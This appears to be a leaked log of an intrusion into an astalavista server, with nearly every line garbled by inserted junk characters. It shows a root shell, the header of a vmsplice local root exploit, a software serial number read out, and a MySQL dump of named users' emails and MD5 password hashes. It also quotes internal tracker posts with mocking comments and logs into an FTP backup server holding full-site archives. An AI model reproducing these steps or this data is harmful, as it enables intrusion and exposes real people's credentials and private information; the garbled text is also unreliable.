$ q Q O) H) W' v+ S9 y1 q& D-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
# P# U! f1 n+ ]2 K, Ddrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system/ E1 @4 x* W$ G2 J Y d$ p
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history2 x. D) f, j: ^. Q
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout5 u, e" G, ^5 S: v0 V/ ^
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile) {; ]- w5 {" C
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc O6 f; F+ S" A9 s- V# ^1 k1 |! R
drwx–x–x 3 com com 4096 Jan 29 2008 domains# |+ h ?6 c: i" f% s5 p
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
0 Q: O3 V0 t7 F* c1 z9 `: d$ O. adrwxrwx— 3 com mail 4096 Jan 6 19:24 imap4 A5 |$ X; T4 H3 f" M* i
-rw——- 1 com com 69 Nov 18 2008 .lesshst4 `2 W+ C$ @7 ?! @9 |
drwx—— 2 com com 4096 Sep 24 2007 mail/ p/ o# y* G) t; o8 Y# X
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
* g+ T, }- g; x" V' N0 Mdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
: z. F a& j4 S8 u# u2 u5 c, c. S9 Xlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
+ O% H/ j8 {. |1 ^3 e5 T- ?/ U-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
+ c1 B" l! N5 k% |% _drwx—— 2 com com 4096 Aug 26 2008 .ssh, K4 j9 l- G2 u
-rwx—— 1 com com 8515 Feb 10 2008 t) f5 }3 u) q% T
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
, [; G2 H- E: w6 Sdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp. ^8 q" \( h9 m; S7 `
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
. _0 X3 {# r: p; L5 I1 E-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
% [9 b# q( I7 `. k* T7 S: V, [-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
0 E/ K8 [5 ^5 l$ f; L. s2 p-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc% c0 t2 H+ i# m$ z# D
8 w( L7 P$ e8 |
sh-3.2# head t.c9 ~0 x2 n; V0 d' T6 _2 w2 M$ ]/ `
/* n7 W. a# n+ z( V. B
* jessica_biel_naked_in_my_bed.c
' `* D: m( Y/ q- |$ v*8 l' {2 \' {' V/ S5 x1 q
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.* T1 ]# ^4 \( P6 \. |6 t
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.6 Y% E$ e! m7 z5 e2 K' P
* Stejnak je to stare jak cyp a aj jakesyk rozbite.4 L. j; h0 v$ X+ g
*
7 [6 O! V5 L( r9 F, u1 w* Linux vmsplice Local Root Exploit
0 g1 R) W% i. }; w3 B# W3 o* By qaaz
$ d' n/ A& _5 W. s8 r*: u8 V1 F# u5 e& ^! p
+ c+ W4 Y7 P" e1 V/ y4 T: ?; w" A/ A& u8 {sh-3.2# cd /
0 {6 c( s" Q4 p9 L: hsh-3.2# ls -la* _2 L e; `" V* D+ E: n* x
total 360" l. a; B. c0 z; s" O: D
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
2 G) A9 n1 z8 o2 O1 P' Bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..6 X! `# c0 ~5 z3 `3 l
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
0 X6 [, @8 A7 c7 _+ _-rw——- 1 root root 10240 Jun 3 02:39 aquota.user9 v6 q/ F3 U/ q( {2 ^& Z* X
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db/ }2 B4 e; j Y; N% `$ `
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck" \4 p5 z4 {; v% b
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
5 d5 q# _9 ?, q6 O0 rdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup+ o l) S" z4 P+ A1 N
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
4 V" ~5 R3 o! n8 rdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
" X2 E# F" `6 H Ddrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
% i1 ]* z: C/ Qdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
: y* D' e" Z1 s8 R5 c1 ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
+ a. d# s, g; t5 `) o+ N-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf( T F5 U! A3 H8 |3 r3 u: K# ^
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib( p4 i+ ~9 ?7 G# p# k
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib647 k0 l9 v& l0 E8 V U
drwx—— 2 root root 16384 Sep 11 2007 lost+found
/ K) q5 \3 M6 l* {- @% |' Ndrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
) D* A) X7 C* r7 j1 }' P# odrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
A- t% ~+ H$ W" K; k& ~$ zdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
* g. w/ O/ K# R, }" F-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg: b7 V" ]9 V$ `9 s8 |
drwxr-xr-x 2 root root 0 Jun 3 02:43 net! t- k3 Q# t* I, t2 S4 V0 u
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt$ y$ u+ x2 O) n" @6 d( L: O$ ^
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
! s5 H+ Q- c- ^% ^* s* k9 b! Zdrwxr-x— 15 root root 4096 Jun 4 08:40 root
2 W0 Y3 ?& x3 o' I Rdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin& o7 P: b- w( \1 Q
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux6 ^4 N& _, B; D: J( o/ _
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv- }# l1 f0 v, |6 S( s1 g
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys' r- U1 } W/ x7 J9 o4 I, {
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp0 H; e8 J8 s9 Q' |
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr# M1 h* L* W3 j; d v' T% |8 t
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var$ z' U5 n$ E! q! Q# C
- N& `3 n7 d& Esh-3.2# cd opt( |! ^- |6 r3 w
sh-3.2# ls -la* O, s' j. a' C, E1 i3 m0 v0 w; j
total 20* `$ E- V$ G& _
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
$ y: d. M/ J5 x! d# j) L7 Xdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. |0 D1 y8 v7 Q; B' Fdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws& i; X0 Q3 I4 O8 d& j9 ]+ g2 q! _4 R
2 s9 b- W! y, A
sh-3.2# cd lsws/4 k; B! Y6 n0 _. v9 |7 B$ `
sh-3.2# ls -la
; _2 J& z5 M% o; Etotal 108: b$ |& V( A% X/ L: `' {# G
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
5 Q) j0 H0 c! C6 t1 Vdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
" H* W7 X- G* D7 U( sdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
; j6 T7 P3 m) Z$ _; kdrwxr-xr-x 13 root root 4096 May 29 15:10 admin& ^4 I% C- X9 r# z
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
6 a+ |6 W& d( \, l8 m! {drwxr-xr-x 2 root root 4096 May 29 15:10 bin
, p2 v; Y! N+ n9 w( l) z hdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
' T1 V6 @8 T1 x) B0 y4 V1 v4 i9 gdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
0 A" ^9 x% Q: m, bdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
( j, c- w U# Z- X" X4 U' o" V% g' A& Ddrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin9 G. b2 @0 ?& |
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib- I, [3 R5 x# R- c
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
# P) M ?6 D a1 Y-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
J/ K! f) Z: K7 E; j-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL/ t3 i0 G, M1 s( J9 O+ Q
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
( x8 |; J; y! g8 ~6 k7 Odrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs9 S! E2 j r6 K4 j
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
4 Q& z" T" z* F: Y( X" sdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
$ ^+ K; |+ W$ z9 ddrwxr-xr-x 3 root root 4096 Mar 20 2008 share
7 s9 n) l0 c% v1 Y' ~7 a2 W-rw-r–r– 1 root root 6 May 29 15:10 VERSION
5 r& R& o0 v5 x" J4 m! G: [; \" H Q# I# z
sh-3.2# cd conf
3 `* U% ^ |6 s( K0 Q" hsh-3.2# ls -la
- D# d8 {( W8 W$ J& Ntotal 48
0 `) [* K+ d; H. ]# mdrwx—— 4 apache apache 4096 Jun 3 02:43 .5 U+ E3 \8 l' M% ]3 q; I
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..3 ]( ^: W0 w, s8 |1 r
drwx—— 2 apache apache 4096 Mar 20 2008 cert
2 S, _3 q; p5 D-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
! L; N& o" }/ Y. N, S. ?2 c# B3 d8 A-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
$ a$ k8 W7 z0 f8 d% J! Z-rw-r–r– 1 root apache 0 Jun 3 14:11 .last. M8 ]( e8 I+ W+ D
-rw——- 1 apache apache 256 May 29 15:10 license.key
# q/ a, Y1 k& `9 a; L7 M3 K9 J-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
h# n( s5 M H-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties% w* k: r5 D* } u
-rw——- 1 apache apache 20 May 29 15:10 serial.no
1 T9 G5 }1 Q( ?' x) t- Adrwx—— 2 apache apache 4096 Mar 20 2008 templates
\" P( ~9 W1 k2 w6 s9 W9 S) t% G+ I
sh-3.2# cat serial.no/ \5 p1 H4 P6 j R5 A
IbDl-oVsO-CKqL-wVRa
( z) S/ v4 ]( n# `6 l: U; `' I; b3 o" b! `1 g$ F- A5 f
sh-3.2# mysql# m2 z3 ?2 q) {2 C% F
Welcome to the MySQL monitor. Commands end with ; or \g.
% t+ G: ^/ m% Z# u4 ]7 t0 eYour MySQL connection id is 2868449 o! l8 S7 t0 z& O9 u3 m4 X
Server version: 5.0.45-community-log MySQL Community Edition (GPL)& r, P7 M8 a7 a; y0 S* v i9 ~; l- [; s
7 s% \0 U5 }1 o/ W2 V, \Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 J2 r# n% A4 v1 P# y6 U5 u' S
h6 w3 s+ Z. |3 @7 Gmysql> show databases;
* l6 S, ]% M6 h2 Y4 D3 a& B0 R+———————–+6 C x( \2 v" \: S
| Database |) @- L7 J+ c! q
+———————–+3 Y; ~$ D) g J3 V' v5 b
| information_schema |
+ j3 s- y T u$ f- [) f/ Y| astanet_ads |
( _; r5 z. e1 _# n| astanet_mailing_lists |& }( u% K( h0 b t' n
| astanet_mediawiki |
U# ]( {; x3 Z, I, _) a. _| astanet_membersystem |5 f# N6 b5 k. q5 H0 A* e
| com_contrexx |' N7 B* V" N; {2 E; H$ I, l
| com_contrexx2 |
: C! b' `9 X0 q: S2 v! J0 [6 c| com_contrexx2_live |; _% m% r5 v. p# e# D. j
| da_roundcube |+ q _5 v9 c Z( ?! D1 T
| dolphin |
( u, S" X' o6 p6 w$ H| ideapool |# t6 q5 c& {6 Z7 ? P
| mysql |- ^7 o4 G4 z6 M7 I, p5 G5 _- a
| test |7 W& L7 Q# E( _2 h/ J5 i/ Q% r5 f
| yourmaster |
) w; C. @' V5 i+ S, \8 x& p( G6 n1 M+———————–+) M' x9 ` N% W+ O" [
14 rows in set (0.00 sec)
" B/ h* J& g. i4 c4 [6 G; Z) b* ?8 E2 _5 W/ F- ^: w
mysql> use ideapool8 v( G( r- `2 z% H' V& a+ g! w
Database changed
+ k- P5 J* E( j, G8 Wmysql> show tables;# _3 }, Y: N# _# d6 ^% X; k l
+———————————–+' Y1 [0 m& C; K8 g
| Tables_in_ideapool |
c4 \/ @. B7 J2 n5 B7 h( B+———————————–+
3 a9 T, K6 R( J: Z( n| eventum_columns_to_display |7 [* e% j! @- l1 i
| eventum_custom_field |
) s* i! S7 T3 `$ t| eventum_custom_field_option |
1 @; b" m* U, u0 Q| eventum_custom_filter |
r6 M8 C' U8 z/ ~) B4 _- g# `| eventum_customer_account_manager |
' W$ Y' W* x, W3 R L' Z: d| eventum_customer_note |
, b5 b. ~, T$ F' x& r6 f* t| eventum_email_account |
. ~7 V" s: M% b" u$ z| eventum_email_draft |* l! t- k3 Y$ e2 H. u/ B0 g
| eventum_email_draft_recipient |
& r: Q& A. r2 r: f- V, K3 Z| eventum_email_response |! k, Z2 r3 S. i1 E7 r7 f$ N
| eventum_faq |
- O: l0 S s9 I- E| eventum_faq_support_level |
q% p$ {& V3 {1 R9 H| eventum_group |8 |; n8 s7 t1 ?7 B( B& _2 T% P
| eventum_history_type |
2 \6 f" C. h; k: {/ J+ B| eventum_irc_notice |
/ a, ^* Y( L' X- O| eventum_issue |
: J$ {% U* J) @| eventum_issue_association |
4 q, o B( o) t: M| eventum_issue_attachment |" r+ g+ y' U6 Z8 L
| eventum_issue_attachment_file | l$ o4 T. A |9 ?) r, |7 v2 |8 N% ~
| eventum_issue_checkin |
4 E$ J2 V& v m4 y2 K) T' S| eventum_issue_custom_field |
0 t2 A- j. `2 q X( [. g' P' F X1 z| eventum_issue_history |4 t; R' y& k" C
| eventum_issue_quarantine |4 H+ }; U) r& `# I9 G& Y H
| eventum_issue_requirement |0 Q6 R3 h& D0 r
| eventum_issue_user |! f/ n' b# X ], v, C1 K
| eventum_issue_user_replier |
, N2 w2 j5 `# p: D$ r* L5 h. e. f, f| eventum_link_filter |
" v c [- o1 I# m" s9 q| eventum_mail_queue | }. `2 L* S, N3 B* r4 O
| eventum_mail_queue_log |
; K( Q$ Q, f9 s% m) S/ a| eventum_news |% x- d& K/ U" u, j9 w J' W N% D* u W
| eventum_note |
4 [; p+ Q! v, f* [| eventum_phone_support |
9 L. |) r5 @( H, Y; O1 f+ ~9 ~| eventum_project |6 R# f+ H* c- W8 q
| eventum_project_category |
& U, t" z5 o2 c' N| eventum_project_custom_field |
7 o' B% D- W7 i" A; u3 T| eventum_project_email_response |
. l( r# T; O6 j7 y| eventum_project_field_display |
! a2 M, m# i" f( i6 B( c3 x7 g| eventum_project_group |9 F) j3 |& m, T$ N. q. G q
| eventum_project_link_filter |
* r" j6 F; `# O' d) u9 @: ?" @| eventum_project_news |2 @$ O! K3 A0 j# N: C5 S5 `0 N
| eventum_project_phone_category |
' ~. A! o' u0 Y. n1 N! k8 P, E. n| eventum_project_priority |
/ M% {: X4 U( P8 X, L3 J| eventum_project_release |
) R$ M# ~- B2 I! d4 g3 G| eventum_project_round_robin |
* m5 W: E8 P7 z: H| eventum_project_status |
1 Z7 s! I2 q7 T1 [| eventum_project_status_date | r$ c4 P1 u7 g, O0 G( }' t; w$ S
| eventum_project_user |
; n" F: g' `- u @| eventum_reminder_action |5 @+ q) C$ _- l" s* f
| eventum_reminder_action_list |7 _* S) E* A& P4 \3 G' [/ y4 P
| eventum_reminder_action_type |3 E4 k% K# |0 Z" w Z7 b- L% o
| eventum_reminder_field |
& r8 |% j& h4 @. b, M5 B6 u| eventum_reminder_history |5 v& J* M/ `' p1 v$ A
| eventum_reminder_level |
* y) j3 F" {, j( C! O* b/ u| eventum_reminder_level_condition |
; m6 x3 \5 O5 X5 `% D| eventum_reminder_operator |2 A& f5 Z. @8 M, t0 [& r
| eventum_reminder_priority |
; m% T/ a P' U# x| eventum_reminder_requirement |
E2 ^* }4 C8 W6 m8 S, @) G9 L| eventum_reminder_triggered_action |* x+ o: k& R T& G
| eventum_resolution |; F9 f) Q. h) C3 E& ?6 y
| eventum_round_robin_user |
2 A% U6 ]/ ^6 m+ I| eventum_search_profile |
0 R! k1 n0 w+ x) J# U| eventum_status |1 X3 g# ?- r- I* }. @9 e
| eventum_subscription |6 P- H$ E- F3 ^8 v
| eventum_subscription_type |
9 G- @ n7 j% z7 Y5 b8 J| eventum_support_email |' g1 }2 m; x# v" B6 [/ F
| eventum_support_email_body |
* {- |* C0 F5 b9 H/ g K$ K+ g- V| eventum_time_tracking |# H9 h }; ]/ H( t' [+ w2 T
| eventum_time_tracking_category |$ u( @6 ~0 {" Y! _
| eventum_user |
% d# e* B* i }/ q# X+———————————–+
9 X9 x! v' A' R: q; \# i5 g+ i# X69 rows in set (0.00 sec)& A# M5 X* T- W/ L* N" V/ T
0 g/ D$ i* M: T# I4 Kmysql> describe eventum_user;; p- _2 p- L4 n1 h, \6 V: N9 B
+————————-+——————+——+—–+———————+—————-+
, K+ P* S- N4 @| Field | Type | Null | Key | Default | Extra |
# g; f$ U9 o' k! ^( [+————————-+——————+——+—–+———————+—————-+0 P Y+ ?0 H3 W# U
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
. d: X4 f- ]/ ~4 K6 w| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |5 e/ p* A K2 _
| usr_customer_id | int(11) unsigned | YES | | NULL | |( y+ D; L* u5 H
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |0 c& \. h/ A6 f* A3 @$ T/ i, j5 H
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |# `6 Y" ]. q& Y" d$ ]) p8 Y
| usr_status | varchar(8) | NO | | active | |. w: [/ ~6 d9 @( {9 v
| usr_password | varchar(32) | NO | | | |: Y& Y! w9 C) I6 T, E
| usr_full_name | varchar(255) | NO | | | |" d F- ^! e& a/ b
| usr_email | varchar(255) | NO | UNI | | |4 j) |5 [! F% w% ]1 w
| usr_preferences | longtext | YES | | NULL | |
9 H; b/ ~. ?0 S( m$ z2 O. T| usr_sms_email | varchar(255) | YES | | NULL | |
5 t3 q/ g! Q* S! G8 W| usr_clocked_in | tinyint(1) | YES | | 0 | |
' ~' B& X; |4 T. x: e; o+ ]4 W| usr_lang | varchar(5) | YES | | NULL | |7 J4 [ t" P& f3 K4 W
+————————-+——————+——+—–+———————+—————-+. G# I( Y' Y0 A6 s K
13 rows in set (0.00 sec)) C5 e$ t9 k9 r/ c6 H6 L# b
3 F9 u, P z5 R# [% J E
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
0 r" y) a2 D: y' x+———————-+——————————-+———————————-+! B* O! z" t4 D# T# m2 |9 ]
| usr_full_name | usr_email | usr_password |! a3 x/ J9 t9 Y7 x; ?4 y
+———————-+——————————-+———————————-+' n. {& p% |+ s. s4 M" Q
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
0 W8 r- H& k3 E9 v$ U9 |7 Q| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |/ G" v0 v, l, U0 o; F2 K6 ?. {- j6 C
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
" w' b5 I# L! Y| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
8 |! ?! _; I, h8 w| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
% ?: P' T6 x$ k/ }% X6 a| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |: \6 a6 x7 J7 S" W2 D
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
- R4 v3 [9 v- k! z( y3 X- [| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
% G8 v8 Y7 t: Q5 S C& [$ Q2 Z| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |9 e7 p8 Q' z1 }5 N& ]# N9 Z
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
# T& Z: y/ V ]| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |* @ W8 ]# R0 t* Q7 L% _6 K
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |8 m& {) k! T0 R* I( q/ n& p
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
) y: x: e( e- G$ @/ M5 m( ~$ h| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
# i5 G( B& {5 S1 H w0 P| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
2 }1 A$ n# |' ^ Y& q* h: v+———————-+——————————-+———————————-+
1 a. Q( _: h# `' G) T' }15 rows in set (0.00 sec)
/ d6 P' L0 ^ O7 J. u# ]: B7 e" i- F6 |, v- D
mysql> select iss_description from eventum_issue where iss_id = 43;, Z; `) P h3 p! N1 H! }! H6 G* }
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+2 O9 W6 H- \4 W# N4 P
| iss_description
1 u' O, e! P* j" u9 m# d|2 ~& w& w: T8 i9 g8 y) ]: h
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
3 f9 Q0 I G: ^9 C# P3 y| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
W/ }# G! K* q% E) t1 P2 p: _connected for 90 mins… 120mins… so what i propose is something like:
6 H/ v+ i5 y" \7 x链接标记[url]http://www.surfthechannel.com/[/url]
$ T& W% k& C7 x$ B7 V; _, \5 n$ K1 ~since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system- \1 \6 L- u" r
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t- J. g) E# i, e7 N; C
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
2 Z$ f8 h. O2 k$ u. c- `if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…. O; ~# q% W* y. g
: m: [9 p$ j7 G: ?
We could also put advertisement during play on the flash video player itself… extra $$…
7 u7 Y! h' o1 g, F m
6 K( A/ |0 [" i/ Z! PBy sykadul |6 o: G- I# n' t" ]1 T1 H2 R5 W
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
7 r9 k# p7 @" U( h1 row in set (0.00 sec)
5 J# E, e# L1 H2 t
0 }, T: j: z b% Y; C. ~ v; P// Money and extra $$ is all they care about. remember that.: F/ X. l) l, h. l2 m
" f- T& E" m' r% W$ ~1 o1 _9 ]
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;; M( l# C4 K& X5 d
+————————+——————————————————————————————————————————————————————————————————————————————-+2 W7 Y& w) x0 i8 {
| iss_summary | iss_description
7 M3 G1 L- \/ \& r7 @|2 Q4 J/ u2 W: O+ d @
+————————+——————————————————————————————————————————————————————————————————————————————-+
" B1 }/ m. [% o| Forum for REAL EXPERTS | Hello,
5 j# b+ \& w3 u; J" E: f8 Q) o% S5 l1 k' S* c% ~
Ishtus and I,
# |/ h& n6 Q" U% v6 N+ x, b2 B+ m7 _2 x# Y( x
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
4 G& n2 F- B YONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..- E C+ j/ v% W# L1 o9 j+ L; B
) a# r! D2 s% q( s+ j
One example a friend of mine from coresecurity.com!+ F2 V! f1 H5 z6 v' y l
' B% ]. b) T2 N& J6 N( nWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..4 h0 O3 d4 D' @5 o6 {
# H- z9 p- @# d1 o- M|
" @2 c, @, J8 r0 e0 a w+————————+——————————————————————————————————————————————————————————————————————————————+
: N; e [* k, }9 T5 J9 w1 row in set (0.00 sec)4 _$ W8 I; {& H
3 I/ B1 e4 ?9 o s# q9 y: R8 t3 N: J: M
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
" F) H8 o5 z, C- v; v- s, k3 Z
* E$ t) e( N/ K; I; m: z2 K, u+ ^mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;5 Y2 m7 V2 N( z; p- G
+——————+———————————————————————————————++ Y ]1 u! ^1 Y; Z
| iss_summary | iss_description |* }( U# W' J4 E" i9 l/ U+ P' `7 ]) W
+——————+———————————————————————————————+( P) n* _% p; j" z x( S
| Website guidance | Virtual Girl which guides you trought the website.; P! ]. O4 _0 b) D: l3 K( a& i! O; J4 M
" [1 @% m) b, ~) A) U$ ]
We need a girl with who you can ( talk )!!!
/ p2 d* s, O9 V$ \Also for the News!; k7 \& {, ?! R0 |* x5 y
So my suggestion is a girl who read you the news loud if you like!
" v. W3 h( O) S( X" ?6 d, Y# Ayou can choose between read yourselfe or she read it for you or both!
, ^% \( e- X2 R
b. J- |9 f* ]! b. Z! rGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
7 z2 d. Z+ K0 u
$ z$ Q( r/ B) w2 EHave a look on the example girls!!
% J# i1 `9 l6 L5 T5 j
) J7 h3 d2 p0 y- ^链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]! s5 t& g. V5 r7 K9 f
/ s0 @" a7 u: e9 d
or that# {8 u, q9 h- f3 Y% _( _1 N
0 _4 W# ~, R- r8 U# I2 s; N
链接标记[url]http://www.yellostrom.de/[/url]
' I- E$ W4 z# n; Q2 w2 |" `( V J) Q1 ?
|
5 q7 }' J2 K+ ^7 {7 O- H) w+——————+———————————————————————————————+
# z5 b% i1 l9 Q! [1 row in set (0.00 sec)
; }4 ]" Y, F p% e9 {* B6 O8 k+ p j9 v% p) ^" S n
// ha ha.
" h1 G, X3 j. ?5 b8 R
k7 w( \ a3 v( ymysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;& E; o& c4 D# v% _5 E; Y# _
+————————–+———————————————————————————————————–+
- g4 P+ t W0 G$ @| iss_summary | iss_description |* y# C2 |& Y+ A: o+ S9 i4 F
+————————–+———————————————————————————————————–+
+ o+ T# y, f% D+ w, Y| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |' S# S" Y: {5 [+ ^9 H9 T7 J6 |
+————————–+———————————————————————————————————–+; G. \& G* j8 z9 O
1 row in set (0.00 sec)
8 E9 m( z# f+ @# s; h4 Q# U! }
* _5 E4 ~ G& K) h& {// LOL.9 o' Y4 U- y# k! {0 k/ U# |: B
( \/ A7 X; M* N7 g* }$ c- x* ]3 M& ? ~. N/ amysql> exit. p0 X+ G9 i+ w# {4 ~. |
Bye
# \5 u: Y3 U. ~9 o$ L- V# t2 Y, R- z$ p; a
sh-3.2# ftp 212.254.194.163% q* s. F" v( N& {* Q" u7 {( K. W
Connected to 212.254.194.163.# E1 N9 v1 U# H2 x$ I& P4 C0 `% P
220 BackupCOM_VW FTP server ready.
# ]6 d' ?4 D* c3 E4 n) ^1 }0 U504 AUTH: security mechanism ‘GSSAPI’ not supported.0 `. J+ K H/ o' j7 J
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
- R$ I: z* f6 j$ J: y0 ^+ a3 kKERBEROS_V4 rejected as an authentication type
`4 l7 {3 s; T$ H3 cName (212.254.194.163:root): astalavista.com
# n# v/ `$ A) `* y; `+ e331 Password required for astalavista.com.6 s5 E# B1 t6 Q7 d4 U* ~/ U
Password:) I( T) y v# b6 W U
230 User astalavista.com logged in.- ]" G, Q5 D1 }
Remote system type is UNIX.: {- |# f) W0 Q4 O; N" G
Using binary mode to transfer files.
% @% `: B1 S! @1 ]: t. U! c% Hftp> ls -la
; m, D4 f3 {* {8 m2 q& Z# W227 Entering Passive Mode (212,254,194,163,2,188)
& t* z8 H/ `. A6 b* x! B. o6 g150 Opening BINARY mode data connection for ‘file list’.
" }8 @ Z9 J0 ]3 Edr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
; @* B( o" t- d" }7 l226 Transfer complete.
) }" [+ L+ [, ?) B$ N" ]ftp> cd astalavista.com
- i& Q' u4 G4 ?250 CWD command successful./ F4 s% a2 b& K
ftp> ls -la# [6 ~; |- R0 n* O6 V
227 Entering Passive Mode (212,254,194,163,2,189)4 J/ g: l/ j( y9 `! n/ o
150 Opening BINARY mode data connection for ‘file list’.( v* x j9 n! z6 X- s
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
) L# ^6 g5 M, ]-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2! u3 t0 D, D) U& ?9 o& g& f" |
